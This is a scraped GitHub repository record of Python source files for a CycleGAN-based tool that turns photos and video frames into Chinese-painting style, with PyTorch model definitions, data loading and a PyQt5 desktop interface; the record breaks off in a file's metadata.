https://github.com/AvatarGanymede/ChinesePaintingStyle
ca9c0e0f3f2f2370e02e2c1c91fcbcac230692fa
c9fbd91efd5f297e902f5658c005202156b4618e
e6f90dd6c21839325d03395ee5a364370d23e3c0
refs/heads/master
2023-06-02T07:10:46.099475
2021-06-16T16:22:56
2021-06-16T16:22:56
374,927,036
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5884491205215454, "alphanum_fraction": 0.602990984916687, "avg_line_length": 42.224998474121094, "blob_id": "e045101d142ba4f6fbc4bc950d21561018e0ab90", "content_id": "955fce257718aaf44354c4aaa3b7cddbff26097e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12104, "license_type": "permissive", "max_line_length": 121, "num_lines": 280, "path": "/models/models.py", "repo_name": "AvatarGanymede/ChinesePaintingStyle", "src_encoding": "UTF-8", "text": "import torch\nimport torch.nn as nn\nfrom torch.nn import init\nimport functools\nfrom torch.optim import lr_scheduler\nfrom utils.params import opt\n\n\ndef init_net(net, init_gain=0.02, gpu_ids=[]):\n # init net\n if len(gpu_ids) > 0:\n assert (torch.cuda.is_available())\n net.to(gpu_ids[0])\n net = torch.nn.DataParallel(net, gpu_ids) # multi-GPUs\n\n # using kaiming init to init weights\n def init_func(m): # define the initialization function\n classname = m.__class__.__name__\n if hasattr(m, 'weight') and (classname.find('Conv') != -1 or classname.find('Linear') != -1):\n init.normal_(m.weight.data, 0.0, init_gain)\n elif classname.find(\n 'BatchNorm2d') != -1: # BatchNorm Layer's weight is not a matrix; only normal distribution applies.\n init.normal_(m.weight.data, 1.0, init_gain)\n init.constant_(m.bias.data, 0.0)\n\n net.apply(init_func)\n return net\n\n\nclass ResnetBlock(nn.Module):\n \"\"\"Define a Resnet block\"\"\"\n\n def __init__(self, dim, padding_type, norm_layer, use_dropout, use_bias):\n \"\"\"Initialize the Resnet block\n\n A resnet block is a conv block with skip connections\n We construct a conv block with build_conv_block function,\n and implement skip connections in <forward> function.\n Original Resnet paper: https://arxiv.org/pdf/1512.03385.pdf\n \"\"\"\n super(ResnetBlock, self).__init__()\n self.conv_block = self.build_conv_block(dim, padding_type, norm_layer, use_dropout, use_bias)\n\n def build_conv_block(self, dim, padding_type, norm_layer, use_dropout, use_bias):\n \"\"\"Construct a convolutional block.\n\n Parameters:\n dim (int) -- the number of channels in the conv layer.\n padding_type (str) -- the name of padding layer: reflect | replicate | zero\n norm_layer -- normalization layer\n use_dropout (bool) -- if use dropout layers.\n use_bias (bool) -- if the conv layer uses bias or not\n\n Returns a conv block (with a conv layer, a normalization layer, and a non-linearity layer (ReLU))\n \"\"\"\n conv_block = []\n p = 0\n if padding_type == 'reflect':\n conv_block += [nn.ReflectionPad2d(1)]\n elif padding_type == 'replicate':\n conv_block += [nn.ReplicationPad2d(1)]\n elif padding_type == 'zero':\n p = 1\n else:\n raise NotImplementedError('padding [%s] is not implemented' % padding_type)\n\n conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p, bias=use_bias), norm_layer(dim), nn.ReLU(True)]\n if use_dropout:\n conv_block += [nn.Dropout(0.5)]\n\n p = 0\n if padding_type == 'reflect':\n conv_block += [nn.ReflectionPad2d(1)]\n elif padding_type == 'replicate':\n conv_block += [nn.ReplicationPad2d(1)]\n elif padding_type == 'zero':\n p = 1\n else:\n raise NotImplementedError('padding [%s] is not implemented' % padding_type)\n conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p, bias=use_bias), norm_layer(dim)]\n\n return nn.Sequential(*conv_block)\n\n def forward(self, x):\n \"\"\"Forward function (with skip connections)\"\"\"\n out = x + self.conv_block(x) # add skip connections\n return out\n\n\nclass ResnetGenerator(nn.Module):\n \"\"\"\n Adapt Torch code and idea from Justin Johnson's neural style transfer project(https://github.com/jcjohnson/fast-neural-style)\n \"\"\"\n\n def __init__(self, input_nc, output_nc, ngf=64, norm_layer=nn.BatchNorm2d, use_dropout=False, n_blocks=6,\n padding_type='reflect'):\n \"\"\"Construct a Resnet-based generator\n\n Parameters:\n input_nc (int) -- the number of channels in input images\n output_nc (int) -- the number of channels in output images\n ngf (int) -- the number of filters in the last conv layer\n norm_layer -- normalization layer\n use_dropout (bool) -- if use dropout layers\n n_blocks (int) -- the number of ResNet blocks\n padding_type (str) -- the name of padding layer in conv layers: reflect | replicate | zero\n \"\"\"\n assert (n_blocks >= 0)\n super(ResnetGenerator, self).__init__()\n if type(norm_layer) == functools.partial:\n use_bias = norm_layer.func == nn.InstanceNorm2d\n else:\n use_bias = norm_layer == nn.InstanceNorm2d\n\n model = [nn.ReflectionPad2d(3),\n nn.Conv2d(input_nc, ngf, kernel_size=7, padding=0, bias=use_bias),\n norm_layer(ngf),\n nn.ReLU(True)]\n\n n_downsampling = 2\n for i in range(n_downsampling): # add downsampling layers\n mult = 2 ** i\n model += [nn.Conv2d(ngf * mult, ngf * mult * 2, kernel_size=3, stride=2, padding=1, bias=use_bias),\n norm_layer(ngf * mult * 2),\n nn.ReLU(True)]\n\n mult = 2 ** n_downsampling\n for i in range(n_blocks): # add ResNet blocks\n\n model += [ResnetBlock(ngf * mult, padding_type=padding_type, norm_layer=norm_layer, use_dropout=use_dropout,\n use_bias=use_bias)]\n\n for i in range(n_downsampling): # add upsampling layers\n mult = 2 ** (n_downsampling - i)\n model += [nn.ConvTranspose2d(ngf * mult, int(ngf * mult / 2),\n kernel_size=3, stride=2,\n padding=1, output_padding=1,\n bias=use_bias),\n norm_layer(int(ngf * mult / 2)),\n nn.ReLU(True)]\n model += [nn.ReflectionPad2d(3)]\n model += [nn.Conv2d(ngf, output_nc, kernel_size=7, padding=0)]\n model += [nn.Tanh()]\n\n self.model = nn.Sequential(*model)\n\n def forward(self, input):\n \"\"\"Standard forward\"\"\"\n return self.model(input)\n\n\ndef define_G(input_nc, output_nc, ngf, use_dropout=False, init_gain=0.02, gpu_ids=[]):\n \"\"\"Create a generator\n\n Parameters:\n input_nc (int) -- the number of channels in input images\n output_nc (int) -- the number of channels in output images\n ngf (int) -- the number of filters in the last conv layer\n netG (str) -- the architecture's name: resnet_9blocks | resnet_6blocks | unet_256 | unet_128\n norm (str) -- the name of normalization layers used in the network: batch | instance | none\n use_dropout (bool) -- if use dropout layers.\n init_type (str) -- the name of our initialization method.\n init_gain (float) -- scaling factor for normal, xavier and orthogonal.\n gpu_ids (int list) -- which GPUs the network runs on: e.g., 0,1,2\n\n Returns a generator\n\n Our current implementation provides two types of generators:\n U-Net: [unet_128] (for 128x128 input images) and [unet_256] (for 256x256 input images)\n The original U-Net paper: https://arxiv.org/abs/1505.04597\n\n Resnet-based generator: [resnet_6blocks] (with 6 Resnet blocks) and [resnet_9blocks] (with 9 Resnet blocks)\n Resnet-based generator consists of several Resnet blocks between a few downsampling/upsampling operations.\n We adapt Torch code from Justin Johnson's neural style transfer project (https://github.com/jcjohnson/fast-neural-style).\n\n\n The generator has been initialized by <init_net>. It uses RELU for non-linearity.\n \"\"\"\n # using batch norm\n norm_layer = functools.partial(nn.BatchNorm2d, affine=True, track_running_stats=True)\n # using resnet-9blocks\n net = ResnetGenerator(input_nc, output_nc, ngf, norm_layer=norm_layer, use_dropout=use_dropout, n_blocks=9)\n # init net\n return init_net(net, init_gain, gpu_ids)\n\n\nclass NLayerDiscriminator(nn.Module):\n \"\"\"Defines a PatchGAN discriminator\"\"\"\n\n def __init__(self, input_nc, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d):\n \"\"\"Construct a PatchGAN discriminator\n\n Parameters:\n input_nc (int) -- the number of channels in input images\n ndf (int) -- the number of filters in the last conv layer\n n_layers (int) -- the number of conv layers in the discriminator\n norm_layer -- normalization layer\n \"\"\"\n super(NLayerDiscriminator, self).__init__()\n if type(norm_layer) == functools.partial: # no need to use bias as BatchNorm2d has affine parameters\n use_bias = norm_layer.func == nn.InstanceNorm2d\n else:\n use_bias = norm_layer == nn.InstanceNorm2d\n\n kw = 4\n padw = 1\n sequence = [nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw), nn.LeakyReLU(0.2, True)]\n nf_mult = 1\n nf_mult_prev = 1\n for n in range(1, n_layers): # gradually increase the number of filters\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=2, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n_layers, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=1, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n\n sequence += [\n nn.Conv2d(ndf * nf_mult, 1, kernel_size=kw, stride=1, padding=padw)] # output 1 channel prediction map\n self.model = nn.Sequential(*sequence)\n\n def forward(self, input):\n \"\"\"Standard forward.\"\"\"\n return self.model(input)\n\n\ndef define_D(input_nc, ndf, n_layers_D=3, init_gain=0.02, gpu_ids=[]):\n \"\"\"Create a discriminator\n\n Parameters:\n input_nc (int) -- the number of channels in input images\n ndf (int) -- the number of filters in the first conv layer\n netD (str) -- the architecture's name: basic | n_layers | pixel\n n_layers_D (int) -- the number of conv layers in the discriminator; effective when netD=='n_layers'\n norm (str) -- the type of normalization layers used in the network.\n init_type (str) -- the name of the initialization method.\n init_gain (float) -- scaling factor for normal, xavier and orthogonal.\n gpu_ids (int list) -- which GPUs the network runs on: e.g., 0,1,2\n\n Returns a discriminator\n\n Our current implementation provides three types of discriminators:\n [basic]: 'PatchGAN' classifier described in the original pix2pix paper.\n It can classify whether 70×70 overlapping patches are real or fake.\n Such a patch-level discriminator architecture has fewer parameters\n than a full-image discriminator and can work on arbitrarily-sized images\n in a fully convolutional fashion.\n\n [n_layers]: With this mode, you can specify the number of conv layers in the discriminator\n with the parameter <n_layers_D> (default=3 as used in [basic] (PatchGAN).)\n\n [pixel]: 1x1 PixelGAN discriminator can classify whether a pixel is real or not.\n It encourages greater color diversity but has no effect on spatial statistics.\n\n The discriminator has been initialized by <init_net>. It uses Leakly RELU for non-linearity.\n \"\"\"\n # using batch norm\n norm_layer = functools.partial(nn.BatchNorm2d, affine=True, track_running_stats=True)\n\n net = NLayerDiscriminator(input_nc, ndf, n_layers_D, norm_layer=norm_layer)\n # init net\n return init_net(net, init_gain, gpu_ids)\n\n\ndef get_scheduler(optimizer):\n def lambda_rule(epoch):\n lr_l = 1.0 - max(0, epoch + opt['epoch_count'] - opt['n_epochs']) / float(opt['n_epochs_decay'] + 1)\n return lr_l\n\n scheduler = lr_scheduler.LambdaLR(optimizer, lr_lambda=lambda_rule)\n return scheduler\n" }, { "alpha_fraction": 0.6461761593818665, "alphanum_fraction": 0.6500483751296997, "avg_line_length": 53.3684196472168, "blob_id": "a4bf6099720613adf13aa40616f4e0724d11dade", "content_id": "32a4287f5cfcf93631c52c5091b9eda62eac3a97", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2066, "license_type": "permissive", "max_line_length": 135, "num_lines": 38, "path": "/test.py", "repo_name": "AvatarGanymede/ChinesePaintingStyle", "src_encoding": "UTF-8", "text": "import os\nfrom utils import create_dataset\nfrom models import create_model\nfrom utils.visualizer import save_images\nfrom utils import html\nfrom utils.params import opt\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\nif __name__ == '__main__':\n dataset = create_dataset('test') # create a dataset given opt.dataset_mode and other options\n dataset_size = len(dataset)\n print('The number of training images = %d' % dataset_size)\n model = create_model(False) # create a model given opt.model and other options\n model.setup() # regular setup: load and print networks; create schedulers\n # create a website\n web_dir = os.path.join(opt['results_dir'], opt['name'], '{}_{}'.format(opt['phase'], opt['epoch'])) # define the website directory\n if opt['load_iter'] > 0: # load_iter is 0 by default\n web_dir = '{:s}_iter{:d}'.format(web_dir, opt.load_iter)\n print('creating web directory', web_dir)\n webpage = html.HTML(web_dir, 'Experiment = %s, Phase = %s, Epoch = %s' % (opt['name'], opt['phase'], opt['epoch']))\n # test with eval mode. This only affects layers like batchnorm and dropout.\n # For [pix2pix]: we use batchnorm and dropout in the original pix2pix. You can experiment it with and without eval() mode.\n # For [CycleGAN]: It should not affect CycleGAN as CycleGAN uses instancenorm without dropout.\n # if opt.eval:\n # model.eval()\n for i, data in enumerate(dataset):\n if i >= opt['num_test']: # only apply our model to opt.num_test images.\n break\n model.set_input(data) # unpack data from data loader\n model.test() # run inference\n visuals = model.get_current_visuals() # get image results\n img_path = model.get_image_paths() # get image paths\n if i % 5 == 0: # save images to an HTML file\n print('processing (%04d)-th image... %s' % (i, img_path))\n save_images(webpage, visuals, img_path, aspect_ratio=opt['aspect_ratio'], width=opt['display_winsize'])\n webpage.save() # save the HTML\n" }, { "alpha_fraction": 0.5713415741920471, "alphanum_fraction": 0.5792599320411682, "avg_line_length": 34.690216064453125, "blob_id": "1d162e3857c76a140d600cea4a1832900bd92d8c", "content_id": "701d70e5aeb996783c57d7be8c52a822e24981c6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6767, "license_type": "permissive", "max_line_length": 115, "num_lines": 184, "path": "/main.py", "repo_name": "AvatarGanymede/ChinesePaintingStyle", "src_encoding": "UTF-8", "text": "import os\nimport sys\nimport threading\nimport time\n\nimport cv2 as cv\nfrom PyQt5.QtGui import QImage, QPixmap\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import *\nfrom gui.chinesepaintings import Ui_MainWindow\nfrom models import create_model\nfrom edge.hed import extract_edge\nimport warnings\nfrom utils.params import opt\nfrom utils import create_dataset, html\nfrom utils.visualizer import save_images\n\nwarnings.filterwarnings(\"ignore\")\nStyleSheet = \"\"\"\n/*标题栏*/\nTitleBar {\n background-color: red;\n}\n/*最小化最大化关闭按钮通用默认背景*/\n#buttonMinimum,#buttonClose {\n border: none;\n background-color: red;\n}\n/*悬停*/\n#buttonMinimum:hover{\n background-color: red;\n color: white;\n}\n#buttonClose:hover {\n color: white;\n}\n/*鼠标按下不放*/\n#buttonMinimum:pressed{\n background-color: Firebrick;\n}\n#buttonClose:pressed {\n color: white;\n background-color: Firebrick;\n}\n\"\"\"\n\n\ndef remove(path):\n filelist = os.listdir(path) # 打开对应的文件夹\n\n for item in filelist:\n os.remove(path+'/'+item)\n\n\ndef getImage(img, self):\n img = cv.cvtColor(img, cv.COLOR_RGB2BGR)\n width = img.shape[1]\n height = img.shape[0]\n image = QImage(img, width, height, QImage.Format_RGB888)\n scale_factor = 0\n if width > height:\n scale_factor = self.org_image.width() / float(width)\n else:\n scale_factor = self.org_image.height() / float(height)\n image = image.scaled(width * scale_factor, height * scale_factor, Qt.IgnoreAspectRatio,\n Qt.SmoothTransformation)\n return image\n\n\nclass MyMainForm(QMainWindow, Ui_MainWindow):\n def __init__(self, parent=None):\n super(MyMainForm, self).__init__(parent)\n self.setupUi(self)\n self.model = create_model(False)\n self.isvideo = False\n self.is_pause = False\n\n def Open(self):\n sc_name, filetype = QFileDialog.getOpenFileName(caption=\"选取文件\", directory=os.getcwd(),\n filter=\"All Files (*)\")\n if sc_name.split(\".\")[-1] != 'jpg' and sc_name.split(\".\")[-1] != 'png' and sc_name.split(\".\")[-1] != 'mp4':\n QMessageBox.critical(self, 'File Type Not Right', 'The type of file selected is not supported!',\n buttons=QMessageBox.Cancel)\n elif sc_name.split(\".\")[-1] == 'mp4':\n self.isvideo = True\n i = 0\n remove('./data/testA')\n capture = cv.VideoCapture(sc_name)\n self.frame_count = capture.get(cv.CAP_PROP_FRAME_COUNT)\n self.frameRate = capture.get(cv.CAP_PROP_FPS)\n if capture.isOpened():\n while True:\n ret, img = capture.read()\n self.progressBar.setValue(i / self.frame_count * 100)\n if not ret:\n break\n last_img = img\n cv.imwrite('./data/testA/'+str(i)+'.jpg', img)\n i = i + 1\n image = getImage(last_img, self)\n self.org_image.setPixmap(QPixmap.fromImage(image))\n else:\n img = cv.imread(sc_name)\n\n remove('./data/testA')\n cv.imwrite('./data/testA/1.jpg', img)\n\n image = getImage(img, self)\n self.org_image.setPixmap(QPixmap.fromImage(image))\n\n def Transfer(self):\n dataset = create_dataset('test') # create a dataset given opt.dataset_mode and other options\n dataset_size = len(dataset)\n self.model.setup()\n web_dir = os.path.join(opt['results_dir'], opt['name'],\n '{}_{}'.format(opt['phase'], opt['epoch'])) # define the website directory\n webpage = html.HTML(web_dir,\n 'Experiment = %s, Phase = %s, Epoch = %s' % (opt['name'], opt['phase'], opt['epoch']))\n for i, data in enumerate(dataset):\n self.progressBar.setValue(i/dataset_size*100)\n if i >= opt['num_test']: # only apply our model to opt.num_test images.\n break\n self.model.set_input(data) # unpack data from data loader\n self.model.test() # run inference\n visuals = self.model.get_current_visuals() # get image results\n img_path = self.model.get_image_paths() # get image paths\n if i % 5 == 0: # save images to an HTML file\n print('processing (%04d)-th image... %s' % (i, img_path))\n save_images(webpage, visuals, img_path, aspect_ratio=opt['aspect_ratio'], width=opt['display_winsize'])\n webpage.save() # save the HTML\n if not self.isvideo:\n self.progressBar.setValue(100)\n rst = cv.imread('./results/Chinese Painting Style/test_latest/images/1_fake_B.png')\n image = getImage(rst, self)\n self.after_image.setPixmap(QPixmap.fromImage(image))\n org = cv.imread('./results/Chinese Painting Style/test_latest/images/1_real_A.png')\n image = getImage(org, self)\n self.org_image.setPixmap(QPixmap.fromImage(image))\n else:\n self.progressBar.setValue(0)\n th = threading.Thread(target=self.Display)\n th.setDaemon(True)\n th.start()\n\n # display the video on the QLabel\n def Display(self):\n i = 0\n while i < self.frame_count:\n # calculate the processing time\n time_start = time.time()\n if self.is_pause:\n continue\n frame = cv.imread('./results/Chinese Painting Style/test_latest/images/'+str(i)+'_fake_B.png')\n org = cv.imread('./results/Chinese Painting Style/test_latest/images/'+str(i)+'_real_A.png')\n image = getImage(frame, self)\n self.after_image.setPixmap(QPixmap.fromImage(image))\n image = getImage(org, self)\n self.org_image.setPixmap(QPixmap.fromImage(image))\n time_end = time.time()\n time_wait = int(1000 / self.frameRate - 1000 * (time_end - time_start))\n if time_wait <= 0:\n time_wait = 1\n cv.waitKey(time_wait)\n self.progressBar.setValue(i/self.frame_count*100)\n i = i + 1\n\n def Pause(self):\n self.is_pause = not self.is_pause\n\n def Play(self):\n self.is_pause = False\n\n\nif __name__ == \"__main__\":\n # 固定的,PyQt5程序都需要QApplication对象。sys.argv是命令行参数列表,确保程序可以双击运行\n app = QApplication(sys.argv)\n app.setStyleSheet(StyleSheet)\n\n # 初始化\n myWin = MyMainForm()\n # 将窗口控件显示在屏幕上\n myWin.show()\n # 程序运行,sys.exit方法确保程序完整退出。\n sys.exit(app.exec_())\n" }, { "alpha_fraction": 0.6144494414329529, "alphanum_fraction": 0.6179229021072388, "avg_line_length": 34.10975646972656, "blob_id": "db958539dfe7f5ba8ceb7cfb7249205e65ea6ea0", "content_id": "34a30d996e165bdc4a3f6d083fa32bacbbc78025", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2879, "license_type": "permissive", "max_line_length": 82, "num_lines": 82, "path": "/utils/__init__.py", "repo_name": "AvatarGanymede/ChinesePaintingStyle", "src_encoding": "UTF-8", "text": "\"\"\" Python package for image processing \"\"\"\nimport torch.utils.data\nfrom utils.dataset import Dataset\nfrom utils.params import opt\nfrom PIL import Image\n\n\ndef save_image(image_numpy, image_path, aspect_ratio=1.0):\n \"\"\"Save a numpy image to the disk\n\n Parameters:\n image_numpy (numpy array) -- input numpy array\n image_path (str) -- the path of the image\n \"\"\"\n\n image_pil = Image.fromarray(image_numpy)\n h, w, _ = image_numpy.shape\n\n if aspect_ratio > 1.0:\n image_pil = image_pil.resize((h, int(w * aspect_ratio)), Image.BICUBIC)\n if aspect_ratio < 1.0:\n image_pil = image_pil.resize((int(h / aspect_ratio), w), Image.BICUBIC)\n image_pil.save(image_path)\n\n\ndef create_dataset(train_or_test, max_dataset_size=float(\"inf\")):\n \"\"\"Create a dataset given the option.\n\n This function wraps the class CustomDatasetDataLoader.\n This is the main interface between this package and 'train.py'/'test.py'\n\n Example:\n >>> from utils import create_dataset\n >>> dataset = create_dataset(train_or_test, max_dataset_size)\n \"\"\"\n data_loader = DataLoader(train_or_test, max_dataset_size)\n data_set = data_loader.load_data()\n return data_set\n\n\ndef __print_size_warning(ow, oh, w, h):\n \"\"\"Print warning information about image size(only print once)\"\"\"\n if not hasattr(__print_size_warning, 'has_printed'):\n print(\"The image size needs to be a multiple of 4. \"\n \"The loaded image size was (%d, %d), so it was adjusted to \"\n \"(%d, %d). This adjustment will be done to all images \"\n \"whose sizes are not multiples of 4\" % (ow, oh, w, h))\n __print_size_warning.has_printed = True\n\n\nclass DataLoader:\n \"\"\"Wrapper class of Dataset class that performs multi-threaded data loading\"\"\"\n\n def __init__(self, train_or_test, max_dataset_size=float(\"inf\")):\n \"\"\"Initialize this class\n\n Step 1: create a dataset instance given the name [dataset_mode]\n Step 2: create a multi-threaded data loader.\n \"\"\"\n self.max_dataset_size = max_dataset_size\n self.dataset = Dataset(train_or_test)\n print(\"dataset [%s] was created\" % type(self.dataset).__name__)\n self.dataloader = torch.utils.data.DataLoader(\n self.dataset,\n batch_size=opt['batch_size'],\n # shuffle=not opt.serial_batches,\n shuffle=True,\n num_workers=int(opt['num_threads']))\n\n def load_data(self):\n return self\n\n def __len__(self):\n \"\"\"Return the number of data in the dataset\"\"\"\n return min(len(self.dataset), self.max_dataset_size)\n\n def __iter__(self):\n \"\"\"Return a batch of data\"\"\"\n for i, data in enumerate(self.dataloader):\n if i * opt['batch_size'] >= self.max_dataset_size:\n break\n yield data\n" }, { "alpha_fraction": 0.6307024955749512, "alphanum_fraction": 0.6699045896530151, "avg_line_length": 38.75862121582031, "blob_id": "851cc5ff65a585e7d4c404bb7698f453ce003164", "content_id": "89b077d9093b3c94b06220cb4c4f09cb7279bd6e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5941, "license_type": "permissive", "max_line_length": 104, "num_lines": 145, "path": "/gui/chinesepaintings.py", "repo_name": "AvatarGanymede/ChinesePaintingStyle", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n# Form implementation generated from reading ui file 'chinesepaintings.ui'\n#\n# Created by: PyQt5 UI code generator 5.9.2\n#\n# WARNING! All changes made in this file will be lost!\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtCore import Qt\nfrom .notitle import TitleBar\n\n\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(958, 535)\n MainWindow.setStyleSheet(\"\")\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n\n MainWindow.setWindowFlags(Qt.FramelessWindowHint) # 隐藏边框\n # 标题栏\n self.titleBar = TitleBar(MainWindow)\n self.titleBar.setGeometry(QtCore.QRect(-1, -1, 960, 42))\n font = QtGui.QFont()\n font.setFamily(\"Consolas\")\n self.titleBar.setFont(font)\n self.titleBar.setStyleSheet(\"font:bold;background-image: url(:/pic/imgs/bg.png);color:#f9f1db;\")\n self.titleBar.windowMinimumed.connect(MainWindow.showMinimized)\n self.titleBar.windowClosed.connect(MainWindow.close)\n self.titleBar.windowMoved.connect(self.move)\n MainWindow.windowTitleChanged.connect(self.titleBar.setTitle)\n MainWindow.windowIconChanged.connect(self.titleBar.setIcon)\n\n self.background = QtWidgets.QLabel(self.centralwidget)\n self.background.setGeometry(QtCore.QRect(0, 0, 960, 540))\n self.background.setStyleSheet(\"background-image: url(:/pic/imgs/bg.png);\")\n self.background.setText(\"\")\n self.background.setObjectName(\"background\")\n self.org_image = QtWidgets.QLabel(self.centralwidget)\n self.org_image.setGeometry(QtCore.QRect(80, 110, 320, 320))\n self.org_image.setStyleSheet(\"border-width: 5px;\\n\"\n\"border-style: solid;\\n\"\n\"border-color: rgb(192, 72, 81);\")\n self.org_image.setText(\"\")\n self.org_image.setObjectName(\"org_image\")\n self.after_image = QtWidgets.QLabel(self.centralwidget)\n self.after_image.setGeometry(QtCore.QRect(560, 110, 320, 320))\n self.after_image.setStyleSheet(\"border-width: 5px;\\n\"\n\"border-style: solid;\\n\"\n\"border-color: rgb(192, 72, 81);\")\n self.after_image.setText(\"\")\n self.after_image.setObjectName(\"after_image\")\n self.transfer = QtWidgets.QPushButton(self.centralwidget)\n self.transfer.setGeometry(QtCore.QRect(430, 290, 101, 41))\n self.transfer.setStyleSheet(\"QPushButton{\\n\"\n\"font: 32pt \\\"方正字迹-周崇谦小篆繁体\\\";\\n\"\n\"color: rgb(192, 72, 81);\\n\"\n\"background-color:transparent;\\n\"\n\"}\\n\"\n\"QPushButton:hover{\\n\"\n\"color: #f9f1db;\\n\"\n\"}\")\n self.transfer.setObjectName(\"transfer\")\n self.OIMG = QtWidgets.QLabel(self.centralwidget)\n self.OIMG.setGeometry(QtCore.QRect(190, 70, 81, 41))\n self.OIMG.setStyleSheet(\"font: 32pt \\\"方正字迹-周崇谦小篆繁体\\\";\\n\"\n\"color: rgb(192, 72, 81);\")\n self.OIMG.setObjectName(\"OIMG\")\n self.AIMG = QtWidgets.QLabel(self.centralwidget)\n self.AIMG.setGeometry(QtCore.QRect(680, 70, 81, 41))\n self.AIMG.setStyleSheet(\"font: 32pt \\\"方正字迹-周崇谦小篆繁体\\\";\\n\"\n\"color: rgb(192, 72, 81);\")\n self.AIMG.setObjectName(\"AIMG\")\n self.open = QtWidgets.QPushButton(self.centralwidget)\n self.open.setGeometry(QtCore.QRect(430, 190, 101, 41))\n self.open.setStyleSheet(\"QPushButton{\\n\"\n\"font: 32pt \\\"方正字迹-周崇谦小篆繁体\\\";\\n\"\n\"color: rgb(192, 72, 81);\\n\"\n\"background-color:transparent;\\n\"\n\"}\\n\"\n\"QPushButton:hover{\\n\"\n\"color: #f9f1db;\\n\"\n\"}\")\n self.open.setObjectName(\"open\")\n self.progressBar = QtWidgets.QProgressBar(self.centralwidget)\n self.progressBar.setGeometry(QtCore.QRect(80, 460, 321, 31))\n self.progressBar.setStyleSheet(\"QProgressBar {\\n\"\n\" border: 2px solid grey;\\n\"\n\" border-radius: 5px;\\n\"\n\" border-color: #c04851;\\n\"\n\" text-align: center;\\n\"\n\" font: 75 12pt \\\"黑体-简\\\";\\n\"\n\" color: #b78d12;\\n\"\n\"}\\n\"\n\"\\n\"\n\"QProgressBar::chunk {\\n\"\n\" background-color: #c04851;\\n\"\n\" width: 20px;\\n\"\n\"}\")\n self.progressBar.setProperty(\"value\", 0)\n self.progressBar.setObjectName(\"progressBar\")\n self.pause = QtWidgets.QPushButton(self.centralwidget)\n self.pause.setGeometry(QtCore.QRect(560, 450, 101, 41))\n self.pause.setStyleSheet(\"QPushButton{\\n\"\n\"font: 32pt \\\"方正字迹-周崇谦小篆繁体\\\";\\n\"\n\"color: rgb(192, 72, 81);\\n\"\n\"background-color:transparent;\\n\"\n\"}\\n\"\n\"QPushButton:hover{\\n\"\n\"color: #f9f1db;\\n\"\n\"}\")\n self.pause.setObjectName(\"pause\")\n self.play = QtWidgets.QPushButton(self.centralwidget)\n self.play.setGeometry(QtCore.QRect(780, 450, 101, 41))\n self.play.setStyleSheet(\"QPushButton{\\n\"\n\"font: 32pt \\\"方正字迹-周崇谦小篆繁体\\\";\\n\"\n\"color: rgb(192, 72, 81);\\n\"\n\"background-color:transparent;\\n\"\n\"}\\n\"\n\"QPushButton:hover{\\n\"\n\"color: #f9f1db;\\n\"\n\"}\")\n self.play.setObjectName(\"play\")\n MainWindow.setCentralWidget(self.centralwidget)\n\n self.retranslateUi(MainWindow)\n self.open.clicked.connect(MainWindow.Open)\n self.transfer.clicked.connect(MainWindow.Transfer)\n self.pause.clicked.connect(MainWindow.Pause)\n self.play.clicked.connect(MainWindow.Play)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"\", \"\"))\n self.transfer.setText(_translate(\"MainWindow\", \"转化\"))\n self.OIMG.setText(_translate(\"MainWindow\", \"原图\"))\n self.AIMG.setText(_translate(\"MainWindow\", \"国画\"))\n self.open.setText(_translate(\"MainWindow\", \"打开\"))\n self.pause.setText(_translate(\"MainWindow\", \"暂停\"))\n self.play.setText(_translate(\"MainWindow\", \"播放\"))\n\nfrom . import source_rc\n" }, { "alpha_fraction": 0.688524603843689, "alphanum_fraction": 0.688524603843689, "avg_line_length": 25.14285659790039, "blob_id": "c7a21c8a18267c2bec21e0e9fa8c684a38958b07", "content_id": "b62d104582fc944c7220dabdacad5c2ab413d757", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 183, "license_type": "permissive", "max_line_length": 61, "num_lines": 7, "path": "/models/__init__.py", "repo_name": "AvatarGanymede/ChinesePaintingStyle", "src_encoding": "UTF-8", "text": "from . import cycle_gan\n\n\ndef create_model(isTrain):\n instance = cycle_gan.CycleGANModel(isTrain)\n print(\"model [%s] was created\" % type(instance).__name__)\n return instance\n" }, { "alpha_fraction": 0.6190913319587708, "alphanum_fraction": 0.6245984435081482, "avg_line_length": 28.255033493041992, "blob_id": "580f7ad5b4354b4dc914b8239473a5e8ac554f98", "content_id": "72d2c5932002ed70027c0e8a2bc868e3db3077bb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4684, "license_type": "permissive", "max_line_length": 96, "num_lines": 149, "path": "/gui/notitle.py", 